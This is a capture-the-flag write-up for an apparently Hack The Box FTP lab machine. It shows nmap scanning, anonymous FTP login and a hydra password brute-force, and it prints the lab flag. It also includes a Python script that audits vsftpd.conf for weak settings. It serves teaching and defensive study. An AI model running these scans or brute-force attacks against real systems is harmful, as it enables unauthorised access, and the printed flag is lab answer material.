02.FAWN (FTP)
FTP, Protocols, Reconnaissance, Anonymous/Guest Access
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ nmap -sV -T4 10.129.188.72 -p-
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
root@htb:~$ nmap -sV -sC -T4 10.129.188.72 -p 21
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.16
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
Service Info: OS: Unix
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln 10.129.188.72 -p 21
* the --script=vuln will run scripts that focus specifically on detecting known
vulnerabilities in the service running on port 21
- e.g., weak FTP configurations, or known vulnerabilities in the FTP service
- if no results are found then the service may be fully patched!
#ANONYMOUS LOGIN METHOD
root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): anonymous
ftp> help
* the get cmd is used to download files from the ftp server
ftp> ls
229 Entering Extended Passive Mode (|||8196|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
* anonymous login is configured on the ftp server
- the anonymous username accepts ANY password given to it!
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||59553|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*************************************************************************************************************************************************| 32 108.88 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (3.46 KiB/s)
ftp> exit
root@htb:~$ cat flag.txt
* 035db21c881520061c53e0536e44f815
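
Seen from the server side, the findings above (ftp-anon login allowed, plain-text control and data connections) map to a few vsftpd.conf options. The following is an added example, not part of the original notes: a small Python audit of a config file's text. The sample configs are constructed, the defaults are taken from vsftpd.conf(5), and the upload check goes one step beyond what the scan showed.

```python
# Added example: audit vsftpd.conf text for the settings behind the scan findings.
# Defaults follow vsftpd.conf(5); a packaged build may ship different values.
DEFAULTS = {
    "anonymous_enable": "YES",
    "ssl_enable": "NO",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
}
# The man page documents YES/NO; TRUE and 1 are treated as enabled here so a
# nonstandard spelling is never read as "off" (assumption, errs on the safe side).
ENABLED = {"YES", "TRUE", "1"}


def parse_conf(text):
    """Return effective settings: built-in defaults overridden by option=value lines."""
    settings = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip().upper()
    return settings


def audit(text):
    """Return (option, finding) pairs for the weak settings seen in the scan."""
    s = parse_conf(text)
    on = lambda key: s[key] in ENABLED
    findings = []
    if on("anonymous_enable"):
        findings.append(("anonymous_enable", "anonymous/ftp login accepted with any password"))
    if not on("ssl_enable"):
        findings.append(("ssl_enable", "control and data connections are plain text"))
    if on("anonymous_enable") and on("write_enable") and on("anon_upload_enable"):
        findings.append(("anon_upload_enable", "anonymous users can upload files"))
    return findings


# Constructed sample configs (not taken from the target host).
WEAK_CONF = "# anonymous_enable not set: default applies\nlisten=YES\nwrite_enable=YES\nanon_upload_enable=YES\n"
HARDENED_CONF = "anonymous_enable=NO\nlocal_enable=YES\nssl_enable=YES\n"

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for option, finding in audit(conf):
            print(f"{name}: {option}: {finding}")
```

A config that never mentions anonymous_enable is still flagged, because the documented default for that option is YES.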
#BRUTE FORCE METHOD
root@htb:~$ locate username
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .
root@htb:~$ locate password
/usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .
root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.188.72 ftp
[21][ftp] host: 10.129.188.72 login: ftp password: password
[21][ftp] host: 10.129.188.72 login: ftp password: 123456
[21][ftp] host: 10.129.188.72 login: ftp password: abc123
[21][ftp] host: 10.129.188.72 login: ftp password: querty
[21][ftp] host: 10.129.188.72 login: ftp password: 12345678
[21][ftp] host: 10.129.188.72 login: ftp password: monkey
[STATUS] 313.00 tries/min, 313 tries in 00:01h, 112 to do in 00:01h, 16 active
1 of 1 target successfully completed, 6 valid passwords found
root@htb:~$ ftp 10.129.188.72
Name (10.129.188.72:root): ftp
331 Please specify the password.
Password: password
ftp> help
* the get cmd is used to download files from the ftp server
ftp> ls
229 Entering Extended Passive Mode (|||8196|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
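* anonymous login is configured on the ftp server
- the ftp user is the anonymous account, and the anonymous username accepts ANY password given to it!
- this is why hydra reports several different passwords as valid for the ftp login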
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||59553|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*************************************************************************************************************************************************| 32 108.88 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (3.46 KiB/s)
ftp> exit
root@htb:~$ cat flag.txt
* 035db21c881520061c53e0536e44f815